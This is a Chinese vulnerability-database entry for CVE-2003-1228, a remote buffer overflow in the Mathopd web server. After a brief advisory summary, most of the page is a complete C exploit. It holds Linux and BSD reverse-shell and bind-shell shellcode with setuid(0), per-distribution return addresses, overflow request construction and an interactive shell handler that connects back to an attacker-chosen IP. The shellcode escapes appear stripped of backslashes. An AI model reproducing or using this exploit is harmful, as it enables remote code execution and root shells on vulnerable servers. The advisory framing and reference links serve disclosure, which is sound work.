MathoPD远程缓冲区溢出漏洞
漏洞ID | 1107566 | 漏洞类型 | 边界条件错误 |
发布时间 | 2003-11-02 | 更新时间 | 2005-10-20 |
CVE编号 | CVE-2003-1228 |
CNNVD-ID | CNNVD-200312-185 |
漏洞平台 | Linux | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
Mathopd是一款WEB服务程序。Mathopd对用户提交的输入缺少充分边界缓冲区检查,远程攻击者可以利用这个漏洞以管理员权限在系统上执行任意指令。提交超长请求给Mathopd服务器,可造成缓冲区溢出,精心构建WEB请求可以进程权限在系统上执行任意指令。
|漏洞EXP
source: http://www.securityfocus.com/bid/9871/info
It has been reported that Mathopd is prone to a remote buffer overflow vulnerability. The issue arises due to a failure to check the bounds of a buffer storing user-supplied input.
It may be possible for attackers to leverage this vulnerability to execute arbitrary instructions on the affected system. Any code executed would be in the security context of the web server process.
//aionmex26.c
//
// mathopd 1.2/3/4/5b9 remote exploit
// discovered/exploit coded by aion
// ([email protected])
// (02/11/2003)
//^M
// need url that redirected
// in config look like this:
// Control {
// Alias /blablabla
// Location http://1.2.3.4
// }
//
// --- request.c:962 ----
// if (send_message) {
// b = buf;
// b += sprintf(b, "<title>%s</title>n"
// "<h1>%s</h1>n", r->status_line, r->status_line);
//
// ... and i realy need a job ...
//
#include <arpa/inet.h>
#include <errno.h>
#include <netdb.h>
#include <netinet/in.h>
#include <setjmp.h>
#include <signal.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>
#define MAXB 1024*8
#define TIMEOUT 5
#define DELAY 100000
#define CLOSE(x) { if(x) { close(x); x=0;}}
#define FREE(x) { if(x) { free(x); x=NULL;}}
#define debug(x,y) { errno=0; y; perror(x); if(errno) exit(0);}
char x86_linux_connback[] =
/* 0x3f = 0x3e + incl %eax - parse avoid by aion */
// setuid(0), setgid(0)
"x31xc0x31xdbxb0x17xcdx80xb0x2excdx80"
/* linux x86 connect back (port=0xb0ef) by eSDee of Netric */
"x31xc0x31xdbx31xc9x51xb1"
"x06x51xb1x01x51xb1x02x51"
"x89xe1xb3x01xb0x66xcdx80"
"x89xc2x31xc0x31xc9x51x51"
"x68x41x42x43x44x66x68xb0"
"xefxb1x02x66x51x89xe7xb3"
"x10x53x57x52x89xe1xb3x03"
"xb0x66xcdx80x31xc9x39xc1"
"x74x06x31xc0xb0x01xcdx80"
"x31xc0xb0x3ex40x89xd3xcdx80"
"x31xc0xb0x3ex40x89xd3xb1x01"
"xcdx80x31xc0xb0x3ex40x89xd3"
"xb1x02xcdx80x31xc0x31xd2"
"x50x68x6ex2fx73x68x68x2f"
"x2fx62x69x89xe3x50x53x89"
"xe1xb0x0bxcdx80x31xc0xb0"
"x01xcdx80";
char x86_linux_bindshell[] =
// setuid(0), setgid(0)
"x31xc0x31xdbxb0x17xcdx80xb0x2excdx80"
/* by [email protected] (36864) */
/* 0x3f = 0x3e + incl %eax - once again by aion */
"xebx75x5ex29xc0x89x46x10x40x89"
"xc3x89x46x0cx40x89x46x08x8dx4e"
"x08xb0x66xcdx80x43xc6x46x10x10"
"x66x89x5ex14x88x46x08x29xc0x89"
"xc2x89x46x18xb0x90x66x89x46x16"
"x8dx4ex14x89x4ex0cx8dx4ex08xb0"
"x66xcdx80x89x5ex0cx43x43xb0x66"
"xcdx80x89x56x0cx89x56x10xb0x66"
"x43xcdx80x86xc3xb0x3ex40x29xc9"
"xcdx80xb0x3ex40x41xcdx80xb0x3e"
"x40x41xcdx80x88x56x07x89x76x0c"
"x87xf3x8dx4bx0cxb0x0bxcdx80xe8"
"x86xffxffxff/bin/sh";
/* x86/bsd PIC portshell shellcode
* by lorian/teso * port 0x4444
*/
unsigned char x86_bsd_portshell[] =
/* + setuidcode 7 bytes */
"x33xc0x50xb0x17x50xcdx80"
"x31xdbxf7xe3x53x43x53x43x53xb0x61x53"
"xcdx80x96x52x66x68x44x44x66x53x89xe5"
"x6ax10x55x56x56x6ax68x58xcdx80xb0x6a"
"xcdx80x60xb0x1excdx80x53x50x50xb0x5a"
"xcdx80x4bx79xf6x52x89xe3x68x6ex2fx73"
"x68x68x2fx2fx62x69x60x5ex5exb0x3bxcd"
"x80";
char x86_bsd_connback[] =
/* BSD x86 connect back (port=0xb0ef) by eSDee of Netric */
"x31xc0x31xdbx53xb3x06x53"
"xb3x01x53xb3x02x53x54xb0"
"x61xcdx80x31xd2x52x52x68"
"x41x41x41x41x66x68xb0xef"
"xb7x02x66x53x89xe1xb2x10"
"x52x51x50x52x89xc2x31xc0"
"xb0x62xcdx80x31xdbx39xc3"
"x74x06x31xc0xb0x01xcdx80"
"x31xc0x50x52x50xb0x5axcd"
"x80x31xc0x31xdbx43x53x52"
"x50xb0x5axcdx80x31xc0x43"
"x53x52x50xb0x5axcdx80x31"
"xc0x50x68x2fx2fx73x68x68"
"x2fx62x69x6ex89xe3x50x54"
"x53x50xb0x3bxcdx80x31xc0"
"xb0x01xcdx80";
struct targets {
char *type;
unsigned long ret_addr;
int bsize;
int retfill;
} tlist[] = {
{ "1.2pl7 freebsd 4.6 (0)", 0xbfbff6f8, 800, 50 },
{ "1.3pl7 freebsd 4.6 (0)", 0xbfbff6e8, 800, 50 },
{ "1.4p1 freebsd 4.6 (0)", 0xbfbff7fc, 800, 50 },
{ "1.2pl7 freebsd 4.6 (1)", 0xbfbff6c0, 800, 50 },
{ "1.3pl7 freebsd 4.6 (1)", 0xbfbff6b0, 800, 50 },
{ "1.4p1 freebsd 4.6 (1)", 0xbfbff7c0, 800, 50 },
{ "1.2pl7 freebsd 4.6 (2)", 0xbfbff640, 800, 50 },
{ "1.3pl7 freebsd 4.6 (2)", 0xbfbff630, 800, 50 },
{ "1.4p1 freebsd 4.6 (2)", 0xbfbff744, 800, 50 },
{ "1.2pl7 freebsd 4.8t", 0xbfbff640, 800, 50 },
{ "1.3pl7 freebsd 4.8t", 0xbfbff630, 800, 50 },
{ "1.4p1 freebsd 4.8t", 0xbfbff740, 800, 50 },
{ "1.2pl7 freebsd 4.9t", 0xbfbff610, 800, 50 },
{ "1.3pl7 freebsd 4.9t", 0xbfbff600, 800, 50 },
{ "1.4p1 freebsd 4.9t", 0xbfbff710, 800, 50 },
{ "1.2pl7 freebsd 5.1t", 0xbfbff5b0, 800, 50 },
{ "1.3pl7 freebsd 5.1t", 0xbfbff5a0, 800, 50 },
{ "1.4p1 freebsd 5.1t", 0xbfbff6b0, 800, 50 },
{ "1.2pl7 slackware 7.1.0", 0xbffff92c, 800, 50 },
{ "1.3pl7 slackware 7.1.0", 0xbffff91c, 800, 50 },
{ "1.4p1 slackware 7.1.0", 0xbffffa24, 800, 50 },
{ "1.2pl7 red hat 6.0t", 0xbffff8dc, 800, 50 },
{ "1.3pl7 red hat 6.0t", 0xbffff8dc, 800, 50 },
{ "1.4p1 red hat 6.0t", 0xbffff9c4, 800, 50 },
{ "1.2pl7 red hat 9 (dynamic 0)", 0xbfffd9c0, 800, 50 },
{ "1.3pl7 red hat 9 (dynamic 0)", 0xbfffe130, 800, 50 },
{ "1.4p1 red hat 9 (dynamic 0)", 0xbfffecd0, 800, 50 },
{ "1.2pl7 red hat 9 (dynamic 1)", 0xbfffe820, 800, 50 },
{ "1.3pl7 red hat 9 (dynamic 1)", 0xbffff110, 800, 50 },
{ "1.4p1 red hat 9 (dynamic 1)", 0xbffff4b0, 800, 50 },
{ "1.2pl7 celinux-2.0.02t", 0xbffff500, 800, 50 },
{ "1.3pl7 celinux-2.0.02t", 0xbffff4f0, 800, 50 },
{ "1.4p1 celinux-2.0.02t", 0xbffff610, 800, 50 },
{ "1.2pl7 asplinux 9t", 0xbffff590, 800, 50 },
{ "1.3pl7 asplinux 9t", 0xbffff5b0, 800, 50 },
{ "1.4p1 asplinux 9t", 0xbffff6b0, 800, 50 },
// 1.5b9 - beta version, always crash in getenv()
{ "1.2/3/4/5 crasht", 0x12345678, 800, 50 },
{ NULL, 0, 0, 0}
};
struct shellcodes {
char *shelltype;
char *shellcode;
int shellport;
int backport;
} slist[] = {
{ "x86_bsd_portshell ", x86_bsd_portshell, 17476, 0 },
{ "x86_bsd_connback ", x86_bsd_connback, 0, 45295 },
{ "x86_linux_bindshell", x86_linux_bindshell, 36864, 0 },
{ "x86_linux_connback ", x86_linux_connback, 0, 45295 },
{ NULL, NULL, 0, 0}
};
fd_set rfds;
static jmp_buf w;
struct sockaddr_in s;
long *addr_ptr, addr=0, inet=0,
starttime, timeout=0, back=0;
int i=0, rlen=0, bsize=0,
retfill=0, t=0, port=80,
offset=60, srvok=1, m302ok=0,
ver=0, exploit=0, shellport=0,
sock=0, backport=0, a=0,
b=0, c=0, d=0,
l=sizeof(s);
char *buff, *ptr, *shellcode=NULL,
ch, brute=0, *target,
*dest, verbose=0, cmd[MAXB],
*shelltype,
path[256] = "/secure/";
int writem() {
return write(t,cmd,strlen(cmd));
}
void vwrite_log(const char *fmt, va_list ap) {
char vbuf[MAXB];
char *p = vbuf; *p = 0;
strcpy(vbuf, "aion> "); p += strlen(vbuf);
vsnprintf(p, sizeof(vbuf) - strlen(vbuf), fmt, ap);
write(2, vbuf, strlen(vbuf));
fflush(NULL);
usleep(DELAY);
}
void log(const char *fmt, ...) {
va_list ap;
va_start(ap, fmt);
vwrite_log(fmt, ap);
va_end(ap);
}
void recvall(int a)
{
do {
i = read(t, cmd, MAXB); cmd[i]=0;
if(i<=0) return;
if(verbose) write(2, cmd, i);
if(a) continue;
if((ptr=strstr(cmd, "302 Moved")))
log(" ... 302 Moved: okn"), m302ok = 1;
if((ptr=strstr(cmd, "Server: "))) {
char *srv=strdup(ptr + strlen("Server: "));
for(i=0; i<strlen(srv); i++)
if(srv[i]=='n'||srv[i]=='r') srv[i]=0;
log(" ... Server: %s %sn", srv,
!(srvok=strncmp(srv, "Mathopd", strlen("Mathopd"))) ? "ok" : "fail");
free(srv);
}
if((ptr=strstr(cmd, "Content-length"))) {
for(i=0; i<strlen(ptr); i++)
if(ptr[i]=='n'||ptr[i]=='r') ptr[i]=0;
log(" ... %snn", ptr);
if(!(ptr=strchr(ptr, 0x20))) return;
ptr++; rlen = atoi(ptr);
}
} while(i>0);
}
int connectm(char *ip, int port, int *t) {
struct sockaddr_in sck;
struct hostent *hp;
alarm(20);
if(!(*t=socket(PF_INET, SOCK_STREAM, 0))) return -1;
if((inet=inet_addr(ip))==-1) {
if((hp=gethostbyname(ip))) memcpy (&inet, hp->h_addr, 4);
else { log("error> cannot resolve %sn", ip); return -1;}
}
sck.sin_family=PF_INET; sck.sin_port=htons(port); sck.sin_addr.s_addr=inet;
inet=connect(*t, (struct sockaddr *)&sck, sizeof(sck));
perror(NULL); alarm(0); return inet;
}
void list_targets () {
log("available targets:n");
for(i=0; tlist[i].type != NULL; i++) {
log(" %2d %stt 0x%08x %5d %4dn",
i+1, tlist[i].type, (unsigned int) tlist[i].ret_addr,
tlist[i].bsize, tlist[i].retfill);
if(!((i+1)%3)) fputc('n', stderr);
}
fputc('n', stderr); log("shellcodes:n");
for(i=0; slist[i].shelltype != NULL; i++)
log(" %2d %s (%d)tt %6d %6dn",
i, slist[i].shelltype, strlen(slist[i].shellcode),
slist[i].shellport, slist[i].backport); fputc('n', stderr);
}
void usage(char *v) {
log("ntmathopd remote exploit by aion ([email protected])nn"
"usage: %s [options] [host[:port]]n"
"options:n"
"base:n"
" -t <target> predefined target (0 for a list)n"
" -s <code> shellcode to usen"
" -p <path> url that redirected (default: %s)n"
"other:n"
" -a <address> shellcode addressn"
" -l <rlen> response lenghtn"
" -i <number> buffer sizen"
" -r <number> fill buffer with ret addrn"
" -x test shellcoden"
" -e exploitn"
" -b <ip> connect back ipn"
" -v verbose modenn",
v, path);
exit(0);
}
void test_shellcode() {
void (* v)(void);
v = (void *) shellcode;
v();
}
void shell() {
while (1) {
FD_SET(0, &rfds);
FD_SET(sock, &rfds);
select(sock + 1, &rfds, NULL, NULL, NULL);
if(FD_ISSET(0, &rfds)) {
debug("... read", i = read(0, cmd, sizeof(cmd)));
debug("... send data", write(sock, cmd, i));
if(!strncmp(cmd, "exit", 4)) {
log("exit ...n");
break;
}
}
if(FD_ISSET(sock, &rfds)) {
debug("... read", i = read(sock, cmd, sizeof(cmd)));
debug("... recv data", write(1, cmd, i));
if(!i) {
log("connection closed by foreign hostn");
break;
}
}
}
}
void sigh(int sn) {
log("use exit cmd ...n", sn);
}
int main(int argc, char **argv, char **env) {
if(argc<=1) usage(argv[0]); fputc('n', stderr);
while((ch=getopt(argc,argv,"t:s:p:a:l:i:r:xeb:vh"))!=EOF)
switch (ch) {
case 't': {
i = atoi(optarg);
if(!i)
list_targets(),
exit(0);
else
i--;
target = tlist[i].type;
addr = tlist[i].ret_addr;
bsize = tlist[i].bsize;
retfill = tlist[i].retfill;
if(strstr(tlist[i].type, "1.3")) ver=3;
if(strstr(tlist[i].type, "1.4")) ver=4;
} break;
case 's': {
i = atoi(optarg);
shelltype = slist[i].shelltype;
shellcode = slist[i].shellcode;
shellport = slist[i].shellport;
backport = slist[i].backport;
} break;
case 'p': strncpy(path, optarg, sizeof(path)); break;
case 'a': addr = strtoul(optarg, NULL, 0); break;
case 'l': rlen = atoi(optarg); break;
case 'i': bsize = atoi(optarg); break;
case 'r': retfill = atoi(optarg); break;
case 'v': verbose++; break;
case 'x': test_shellcode(); break;
case 'e': exploit++; break;
case 'b': {
strncpy(cmd, optarg, sizeof(cmd));
for(i = 0; i < strlen(cmd); i++)
if(cmd[i] == '.') cmd[i] = ' ';
sscanf(cmd, "%d %d %d %d", &a, &b, &c, &d);
if(!a||!b||!c||!d)
log("0 in the ip. pls use anothern"),
exit(0);
if(!shellcode)
log("use -s option before -bn"),
exit(0);
if(shellcode==x86_bsd_connback)
shellcode[24] = (char ) a,
shellcode[25] = (char ) b,
shellcode[26] = (char ) c,
shellcode[27] = (char ) d,
memcpy(&back, shellcode+24, 4);
if(shellcode==x86_linux_connback)
shellcode[12+33] = (char ) a,
shellcode[12+34] = (char ) b,
shellcode[12+35] = (char ) c,
shellcode[12+36] = (char ) d,
memcpy(&back, shellcode+12+33, 4);
} break;
case 'h': default: usage(argv[0]); break;
}
dest=argv[argc - 1];
ptr=strchr(dest,':'); if(ptr!=NULL) { ptr[0]=' '; ptr++; port=atoi(ptr);}
log("start attack: (1.%d) %snn", ver, target);
log("connecting to %s %d ... ", dest, port);
if(connectm(dest, port, &t)) exit(0);
log("building query ...n");
if(ver>3) {
sprintf(cmd, "Host: %sn", dest);
target=strdup(cmd);
} else
target=strdup("");
sprintf(cmd,
"GET %s HTTP/1.0n"
"%s"
"Accept: text/html, text/plainn"
"Accept: application/postscript, text/sgml, */*;q=0.01n"
"Accept-Encoding: gzip, compressn"
"Accept-Language: enn"
"Negotiate: transn"
"User-Agent: Lynx/6.6.6n"
"n", path, target);
log("sending query (%d) ... ", strlen(cmd));
if(verbose) log("send>n%sn<sendn", cmd);
writem(); perror(NULL);
log("receiving data ...n");
recvall(rlen);
close(t);
if(srvok)
exit(0);
if(!m302ok)
log("url path not redirected. use -p to overriden"),
exit(0);
if(!rlen)
log("rlen auto detection fail. use -l to overriden"),
exit(0);
if(rlen % 2)
log("alignment error (rlen: %d). not exploitable.n", rlen),
exit(0);
log("addr: 0x%xn", (unsigned int) addr);
log("rlen: %dn", rlen);
log("offset: %dn", offset);
addr += rlen + offset;
log("use addr: 0x%x (addr + rlen + offset)n", (unsigned int) addr);
bsize-=rlen;
bsize-=retfill;
bsize/=2;
log("buffer size: %d ((bsize-rlen-retfill)/2)n", bsize);
log("retfill: %dn", retfill);
log("shellcode len: %dnn", strlen(shellcode));
if(!exploit)
log("all seems ok. run again with -e optionn"),
exit(0);
if(backport) {
if(!back)
log("no connect back ip. use -b optionn"),
exit(0);
log("connect back to: 0x%08x %dn", (unsigned long) back, backport);
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
s.sin_family = AF_INET;
s.sin_port = htons(backport);
s.sin_addr.s_addr = htonl(INADDR_ANY);
debug("... bind", bind(sock, (struct sockaddr *)&s, sizeof(s)));
debug("... listen", listen(sock, 5));
}
starttime = time(NULL); setjmp(w);
log("ready in %d sec...r", starttime + TIMEOUT - time(NULL));
if(starttime + TIMEOUT >= time(NULL)) longjmp(w, 1);
log("connecting to %s %d ... ", dest, port);
if(connectm(dest, port, &t)) exit(0);
log("building data ...n");
buff = (char *)malloc(bsize+retfill*4+100);
memset(buff, 0x00, bsize+retfill*4+100);
for(i=0; i<bsize; i++) buff[i] = 0x90;
ptr=buff+((bsize)-(strlen(shellcode)));
for(i=0; i<strlen(shellcode); i++) *(ptr++) = shellcode[i];
addr_ptr = (long *)ptr;
for(i=0; i<retfill; i+=4) *(addr_ptr++)=addr;
log("building query + data ...n");
sprintf(cmd,
"GET %s%s HTTP/1.0n"
"%s"
"Accept: text/html, text/plainn"
"Accept: application/postscript, text/sgml, */*;q=0.01n"
"Accept-Encoding: gzip, compressn"
"Accept-Language: enn"
"Negotiate: transn"
"User-Agent: Lynx/6.6.6n"
"n", path, buff, target);
log("sending query + data (all: %d) (buff: %d) ... ",
strlen(cmd), strlen(buff));
if(verbose) log("send>n%sn<sendn", cmd);
writem(); perror(NULL);
log("shell ...n");
if(shellport) {
log("connecting to %s %d ... ", dest, shellport);
sleep(1); if(connectm(dest, shellport, &sock)) exit(0);
}
if(backport) {
debug("... accept", sock = accept(sock, (struct sockaddr *)&s, &l));
}
signal(2, sigh);
shell();
CLOSE(t);
CLOSE(sock);
FREE(target);
log("done.n");
return 0;
}
|参考资料
来源:XF
名称:mathopd-preparereply-bo(15474)
链接:http://xforce.iss.net/xforce/xfdb/15474
来源:BID
名称:9871
链接:http://www.securityfocus.com/bid/9871
来源:www.securiteam.com
链接:http://www.securiteam.com/unixfocus/5FP0C1FCAW.html
来源:SECUNIA
名称:10385
链接:http://secunia.com/advisories/10385/
来源:BUGTRAQ
名称:20031208Re:[Fwd:SecurityAlert;possiblebufferoverflowinallMathopd
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=107090601705839&w;=2
来源:BUGTRAQ
名称:20031205[Fwd:SecurityAlert;possiblebufferoverflowinallMathopdversions]
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=107064887507504&w;=2
来源:NSFOCUS
名称:6217
链接:http://www.nsfocus.net/vulndb/6217
Hummingbird CyberDOCS漏洞 漏洞ID 1202233 漏洞类型 未知 发布时间 2003-12-31 更新时间 2003-12-31 CVE编号 CVE-2003-1102 CNNVD-ID CNNVD-200312-104 漏洞平台 N/…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666